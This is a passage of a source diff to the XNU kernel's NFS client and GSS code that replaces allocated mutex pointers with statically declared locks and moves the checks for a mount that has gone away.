NB_DELWRI); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite++; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } /* * Since for the NB_ASYNC case, we've reassigned the buffer to the @@ -2812,12 +2809,12 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) */ if (ISSET(bp->nb_flags, NB_ASYNC)) { /* move to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { /* either there's an error or we don't need to commit */ @@ -3051,19 +3048,19 @@ nfs_buf_write_rpc(struct nfsbuf *bp, int iomode, thread_t thd, kauth_cred_t cred SET(bp->nb_flags, NB_ERROR); if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) { nrpcs = (length + nmwsize - 1) / nmwsize; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp->nb_rpcs -= nrpcs; if (bp->nb_rpcs == 0) { /* No RPCs left, so the buffer's done */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_write_finish(bp, thd, cred); } else { /* wait for the last RPC to mark it done */ while (bp->nb_rpcs > 0) { - msleep(&bp->nb_rpcs, nfs_buf_mutex, 0, + msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0, "nfs_buf_write_rpc_cancel", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { nfs_buf_write_finish(bp, thd, cred); @@ -3284,14 +3281,14 @@ out: */ multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC); if (multasyncrpc) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } bp->nb_rpcs--; finished = (bp->nb_rpcs == 0); if (multasyncrpc) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } if (finished) { @@ -3364,7 +3361,7 @@ nfs_flushcommits(nfsnode_t np, int nowait) if (nowait) { flags |= NBI_NOWAIT; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); wverf = nmp->nm_verf; if (!nfs_buf_iterprepare(np, &blist, flags)) { while ((bp = LIST_FIRST(&blist))) { @@ -3439,7 +3436,7 @@ nfs_flushcommits(nfsnode_t np, int nowait) } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (LIST_EMPTY(&commitlist)) { error = ENOBUFS; @@ -3514,9 +3511,9 @@ nfs_flushcommits(nfsnode_t np, int nowait) if (retv) { /* move back to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_release(bp, 1); continue; } @@ -3526,10 +3523,10 @@ nfs_flushcommits(nfsnode_t np, int nowait) nfs_node_unlock(np); vnode_startwrite(NFSTOV(np)); if (ISSET(bp->nb_flags, NB_DELWRI)) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite--; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(&nfs_nbdwrite); } CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI)); @@ -3543,9 +3540,9 @@ nfs_flushcommits(nfsnode_t np, int nowait) } /* move to clean list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); bp->nb_dirtyoff = bp->nb_dirtyend = 0; @@ -3593,13 +3590,13 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr) nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (np->n_bflag & NBFLUSHINPROG) { np->n_bflag |= NBFLUSHWANT; - error = msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_flush", NULL); + error = msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_flush", NULL); if ((error && (error != EWOULDBLOCK)) || ((error = nfs_sigintr(NFSTONMP(np), NULL, thd, 0)))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); goto out; } } @@ -3615,7 +3612,7 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr) again: FSDBG(518, LIST_FIRST(&np->n_dirtyblkhd), np->n_flag, 0, 0); if (!NFSTONMP(np)) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); error = ENXIO; goto done; } @@ -3641,7 +3638,7 @@ again: nfs_buf_refrele(bp); } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); error = error2; goto done; } @@ -3677,14 +3674,14 @@ again: continue; } nfs_buf_remfree(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (ISSET(bp->nb_flags, NB_ERROR)) { nfs_node_lock_force(np); np->n_error = bp->nb_error ? bp->nb_error : EIO; np->n_flag |= NWRITEERR; nfs_node_unlock(np); nfs_buf_release(bp, 1); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); continue; } SET(bp->nb_flags, NB_ASYNC); @@ -3693,11 +3690,11 @@ again: SET(bp->nb_flags, NB_STABLE); } nfs_buf_write(bp); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (waitfor == MNT_WAIT || waitfor == MNT_DWAIT) { while ((error = vnode_waitforwrites(NFSTOV(np), 0, slpflag, slptimeo, "nfsflush"))) { @@ -3730,7 +3727,7 @@ again: np->n_flag |= NMODIFIED; nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); goto again; } @@ -3740,11 +3737,11 @@ again: np->n_flag |= NMODIFIED; nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!LIST_EMPTY(&np->n_dirtyblkhd)) { goto again; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_node_lock_force(np); /* * OK, it looks like there are no dirty blocks. If we have no @@ -3775,10 +3772,10 @@ again: } nfs_node_unlock(np); done: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); flags = np->n_bflag; np->n_bflag &= ~(NBFLUSHINPROG | NBFLUSHWANT); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (flags & NBFLUSHWANT) { wakeup(&np->n_bflag); } @@ -3810,7 +3807,7 @@ nfs_vinvalbuf_internal( } } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); for (;;) { list = NBI_CLEAN; if (nfs_buf_iterprepare(np, &blist, list)) { @@ -3833,13 +3830,13 @@ nfs_vinvalbuf_internal( FSDBG(554, np, bp, -1, error); nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, list); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } } nfs_buf_refrele(bp); FSDBG(554, np, bp, NBOFF(bp), bp->nb_flags); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if ((flags & V_SAVE) && UBCINFOEXISTS(NFSTOV(np)) && bp->nb_np && (NBOFF(bp) < (off_t)np->n_size)) { /* extra paranoia: make sure we're not */ @@ -3921,28 +3918,28 @@ nfs_vinvalbuf_internal( * be stuck in this loop forever because * the buffer will continue to stay dirty. */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_buf_itercomplete(np, &blist, list); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } error = 0; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); continue; } } SET(bp->nb_flags, NB_INVAL); // hold off on FREEUPs until we're done here nfs_buf_release(bp, 0); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } nfs_buf_itercomplete(np, &blist, list); } if (!LIST_EMPTY(&(np)->n_dirtyblkhd) || !LIST_EMPTY(&(np)->n_cleanblkhd)) { panic("nfs_vinvalbuf: flush/inval failed"); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_node_lock_force(np); if (!(flags & V_SAVE)) { np->n_flag &= ~NMODIFIED; @@ -3978,15 +3975,6 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf FSDBG_TOP(554, np, flags, intrflg, 0); - /* - * If the mount is gone no sense to try and write anything. - * and hang trying to do IO. - */ - if (nfs_mount_gone(nmp)) { - flags &= ~V_SAVE; - ubcflags &= ~UBC_PUSHALL; - } - if (nmp && !NMFLAG(nmp, INTR)) { intrflg = 0; } @@ -3999,12 +3987,12 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf } /* First wait for any other process doing a flush to complete. */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (np->n_bflag & NBINVALINPROG) { np->n_bflag |= NBINVALWANT; - msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts); + msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts); if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } if (np->n_bflag & NBINVALINPROG) { @@ -4012,10 +4000,15 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf } } np->n_bflag |= NBINVALINPROG; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); /* Now, flush as required. */ again: + /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */ + if (nfs_mount_gone(nmp)) { + flags &= ~V_SAVE; + } + error = nfs_vinvalbuf_internal(np, flags, thd, cred, slpflag, 0); while (error) { FSDBG(554, np, 0, 0, error); @@ -4025,6 +4018,11 @@ again: error = nfs_vinvalbuf_internal(np, flags, thd, cred, 0, slptimeo); } + /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */ + if (nfs_mount_gone(nmp)) { + ubcflags &= ~UBC_PUSHALL; + } + /* get the pages out of vm also */ if (UBCINFOEXISTS(vp) && (size = ubc_getsize(vp))) { if ((error = ubc_msync(vp, 0, size, NULL, ubcflags))) { @@ -4042,10 +4040,10 @@ again: } } done: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nflags = np->n_bflag; np->n_bflag &= ~(NBINVALINPROG | NBINVALWANT); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (nflags & NBINVALWANT) { wakeup(&np->n_bflag); } @@ -4064,7 +4062,7 @@ nfs_wait_bufs(nfsnode_t np) struct nfsbuflists blist; int error = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!nfs_buf_iterprepare(np, &blist, NBI_CLEAN)) { while ((bp = LIST_FIRST(&blist))) { LIST_REMOVE(bp, nb_vnbufs); @@ -4074,7 +4072,7 @@ nfs_wait_bufs(nfsnode_t np) if (error != EAGAIN) { nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, NBI_CLEAN); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } } @@ -4092,7 +4090,7 @@ nfs_wait_bufs(nfsnode_t np) if (error != EAGAIN) { nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, NBI_DIRTY); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } } @@ -4101,7 +4099,7 @@ nfs_wait_bufs(nfsnode_t np) } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } @@ -4124,7 +4122,7 @@ again: return; } - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); niod = nmp->nm_niod; /* grab an nfsiod if we don't have one already */ @@ -4140,12 +4138,12 @@ again: * We may try a couple times if other callers * get the new threads before we do. */ - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); started++; if (!nfsiod_start()) { goto again; } - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); } } @@ -4179,23 +4177,23 @@ again: if (!nmp->nm_niod) { if (niod) { /* give it the nfsiod we just grabbed */ nmp->nm_niod = niod; - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); wakeup(niod); } else if (nfsiod_thread_count > 0) { /* just queue it up on nfsiod mounts queue if needed */ if (nmp->nm_iodlink.tqe_next == NFSNOLIST) { TAILQ_INSERT_TAIL(&nfsiodmounts, nmp, nm_iodlink); } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } else { printf("nfs_asyncio(): no nfsiods? %d %d (%d)\n", nfsiod_thread_count, NFSIOD_MAX, started); - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); /* we have no other option but to be persistent */ started = 0; goto again; } } else { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } FSDBG_BOT(552, nmp, 0, 0, 0); diff --git a/bsd/nfs/nfs_gss.c b/bsd/nfs/nfs_gss.c index 42f8ea0ac..2d90650f0 100644 --- a/bsd/nfs/nfs_gss.c +++ b/bsd/nfs/nfs_gss.c @@ -126,14 +126,14 @@ #if CONFIG_NFS_SERVER u_long nfs_gss_svc_ctx_hash; struct nfs_gss_svc_ctx_hashhead *nfs_gss_svc_ctx_hashtbl; -lck_mtx_t *nfs_gss_svc_ctx_mutex; -lck_grp_t *nfs_gss_svc_grp; +static LCK_GRP_DECLARE(nfs_gss_svc_grp, "rpcsec_gss_svc"); +static LCK_MTX_DECLARE(nfs_gss_svc_ctx_mutex, &nfs_gss_svc_grp); uint32_t nfsrv_gss_context_ttl = GSS_CTX_EXPIRE; #define GSS_SVC_CTX_TTL ((uint64_t)max(2*GSS_CTX_PEND, nfsrv_gss_context_ttl) * NSEC_PER_SEC) #endif /* CONFIG_NFS_SERVER */ #if CONFIG_NFS_CLIENT -lck_grp_t *nfs_gss_clnt_grp; +LCK_GRP_DECLARE(nfs_gss_clnt_grp, "rpcsec_gss_clnt"); #endif /* CONFIG_NFS_CLIENT */ #define KRB5_MAX_MIC_SIZE 128 @@ -186,15 +186,8 @@ const uint32_t nfs_gss_ctx_max = GSS_SVC_MAXCONTEXTS; void nfs_gss_init(void) { -#if CONFIG_NFS_CLIENT - nfs_gss_clnt_grp = lck_grp_alloc_init("rpcsec_gss_clnt", LCK_GRP_ATTR_NULL); -#endif /* CONFIG_NFS_CLIENT */ - #if CONFIG_NFS_SERVER - nfs_gss_svc_grp = lck_grp_alloc_init("rpcsec_gss_svc", LCK_GRP_ATTR_NULL); - nfs_gss_svc_ctx_hashtbl = hashinit(SVC_CTX_HASHSZ, M_TEMP, &nfs_gss_svc_ctx_hash); - nfs_gss_svc_ctx_mutex = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL); nfs_gss_svc_ctx_timer_call = thread_call_allocate(nfs_gss_svc_ctx_timer, NULL); #endif /* CONFIG_NFS_SERVER */ @@ -537,12 +530,12 @@ nfs_gss_clnt_ctx_dump(struct nfsmount *nmp) lck_mtx_lock(&nmp->nm_lock); NFS_GSS_DBG("Enter\n"); TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); printf("context %d/%d: refcnt = %d, flags = %x\n", kauth_cred_getasid(cp->gss_clnt_cred), kauth_cred_getauid(cp->gss_clnt_cred), cp->gss_clnt_refcnt, cp->gss_clnt_flags); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } NFS_GSS_DBG("Exit\n"); lck_mtx_unlock(&nmp->nm_lock); @@ -676,12 +669,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p microuptime(&now); lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, req->r_cred)) { @@ -698,7 +691,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p bcmp(cp->gss_clnt_principal, principal, plen) != 0) { cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); NFS_GSS_DBG("Marking %s for deletion because %s does not match\n", NFS_GSS_CTX(req, cp), principal); NFS_GSS_DBG("len = (%zu,%zu), nt = (%d,%d)\n", cp->gss_clnt_prinlen, plen, @@ -717,7 +710,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p if (cp->gss_clnt_nctime + GSS_NEG_CACHE_TO >= now.tv_sec || cp->gss_clnt_nctime == 0) { NFS_GSS_DBG("Context %s (refcnt = %d) not expired returning EAUTH nctime = %ld now = %ld\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt, cp->gss_clnt_nctime, now.tv_sec); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); return NFSERR_EAUTH; @@ -733,7 +726,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p NFS_GSS_DBG("Context %s has expired but we still have %d references\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); error = nfs_gss_clnt_ctx_copy(cp, &ncp); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (error) { lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); @@ -745,7 +738,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p if (cp->gss_clnt_nctime) { nmp->nm_ncentries--; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); break; } @@ -753,12 +746,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p /* Found a valid context to return */ cp->gss_clnt_refcnt++; req->r_gss_ctx = cp; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); return 0; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } if (!cp && nfs_root_steals_ctx && principal == NULL && kauth_cred_getuid(req->r_cred) == 0) { @@ -798,7 +791,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p } cp->gss_clnt_cred = req->r_cred; kauth_cred_ref(cp->gss_clnt_cred); - cp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL); + lck_mtx_init(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL); cp->gss_clnt_ptime = now.tv_sec - GSS_PRINT_DELAY; if (principal) { MALLOC(cp->gss_clnt_principal, uint8_t *, plen + 1, M_TEMP, M_WAITOK | M_ZERO); @@ -905,10 +898,10 @@ retry: * doing the context setup. Wait until the context thread * is null. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_thread && cp->gss_clnt_thread != current_thread()) { cp->gss_clnt_flags |= GSS_NEEDCTX; - msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL); + msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL); slpflag &= ~PCATCH; if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) { return error; @@ -916,7 +909,7 @@ retry: nfs_gss_clnt_ctx_unref(req); goto retry; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_COMPLETE) { /* @@ -926,26 +919,26 @@ retry: * we allocate a new sequence number and allow this request * to proceed. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); while (win_getbit(cp->gss_clnt_seqbits, ((cp->gss_clnt_seqnum - cp->gss_clnt_seqwin) + 1) % cp->gss_clnt_seqwin)) { cp->gss_clnt_flags |= GSS_NEEDSEQ; - msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL); + msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL); slpflag &= ~PCATCH; if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) { return error; } - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_INVAL) { /* Renewed while while we were waiting */ - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); goto retry; } } seqnum = ++cp->gss_clnt_seqnum; win_setbit(cp->gss_clnt_seqbits, seqnum % cp->gss_clnt_seqwin); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); MALLOC(gsp, struct gss_seq *, sizeof(*gsp), M_TEMP, M_WAITOK | M_ZERO); if (gsp == NULL) { @@ -1489,9 +1482,9 @@ retry: /* * The context is apparently established successfully */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= GSS_CTX_COMPLETE; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); cp->gss_clnt_proc = RPCSEC_GSS_DATA; network_seqnum = htonl(cp->gss_clnt_seqwin); @@ -1543,7 +1536,7 @@ nfsmout: * It will be removed when the reference count * drops to zero. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (error) { cp->gss_clnt_flags |= GSS_CTX_INVAL; } @@ -1556,7 +1549,7 @@ nfsmout: cp->gss_clnt_flags &= ~GSS_NEEDCTX; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); NFS_GSS_DBG("Returning error = %d\n", error); return error; @@ -1620,7 +1613,7 @@ bad: /* * Give up on this context */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= GSS_CTX_INVAL; /* @@ -1631,7 +1624,7 @@ bad: cp->gss_clnt_flags &= ~GSS_NEEDCTX; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); return error; } @@ -2214,7 +2207,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req) * sequence number window to indicate it's done. * We do this even if the request timed out. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); gsp = SLIST_FIRST(&req->r_gss_seqlist); if (gsp && gsp->gss_seqnum > (cp->gss_clnt_seqnum - cp->gss_clnt_seqwin)) { win_resetbit(cp->gss_clnt_seqbits, @@ -2239,7 +2232,7 @@ nfs_gss_clnt_rpcdone(struct nfsreq *req) cp->gss_clnt_flags &= ~GSS_NEEDSEQ; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } /* @@ -2251,9 +2244,9 @@ nfs_gss_clnt_ctx_ref(struct nfsreq *req, struct nfs_gss_clnt_ctx *cp) { req->r_gss_ctx = cp; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } /* @@ -2278,7 +2271,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req) req->r_gss_ctx = NULL; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (--cp->gss_clnt_refcnt < 0) { panic("Over release of gss context!\n"); } @@ -2305,7 +2298,7 @@ nfs_gss_clnt_ctx_unref(struct nfsreq *req) cp->gss_clnt_nctime = now.tv_sec; neg_cache = 1; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (destroy) { NFS_GSS_DBG("Destroying context %s\n", NFS_GSS_CTX(req, cp)); if (nmp) { @@ -2364,12 +2357,12 @@ nfs_gss_clnt_ctx_neg_cache_reap(struct nfsmount *nmp) continue; } /* Not referenced, remove it. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_refcnt == 0) { cp->gss_clnt_flags |= GSS_CTX_DESTROY; destroy = 1; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (destroy) { TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); nmp->nm_ncentries++; @@ -2460,7 +2453,7 @@ nfs_gss_clnt_ctx_copy(struct nfs_gss_clnt_ctx *scp, struct nfs_gss_clnt_ctx **dc return ENOMEM; } bzero(dcp, sizeof(struct nfs_gss_clnt_ctx)); - dcp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL); + lck_mtx_init(&dcp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL); dcp->gss_clnt_cred = scp->gss_clnt_cred; kauth_cred_ref(dcp->gss_clnt_cred); dcp->gss_clnt_prinlen = scp->gss_clnt_prinlen; @@ -2500,10 +2493,8 @@ nfs_gss_clnt_ctx_destroy(struct nfs_gss_clnt_ctx *cp) host_release_special_port(cp->gss_clnt_mport); cp->gss_clnt_mport = IPC_PORT_NULL; - if (cp->gss_clnt_mtx) { - lck_mtx_destroy(cp->gss_clnt_mtx, nfs_gss_clnt_grp); - cp->gss_clnt_mtx = (lck_mtx_t *)NULL; - } + lck_mtx_destroy(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp); + if (IS_VALID_CRED(cp->gss_clnt_cred)) { kauth_cred_unref(&cp->gss_clnt_cred); } @@ -2550,9 +2541,9 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req) } nmp = req->r_nmp; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_INVAL) { - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); return 0; // already being renewed } @@ -2563,7 +2554,7 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req) cp->gss_clnt_flags &= ~GSS_NEEDSEQ; wakeup(cp); } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (cp->gss_clnt_proc == RPCSEC_GSS_DESTROY) { return EACCES; /* Destroying a context is best effort. Don't renew. */ @@ -2623,13 +2614,13 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp) while ((cp = 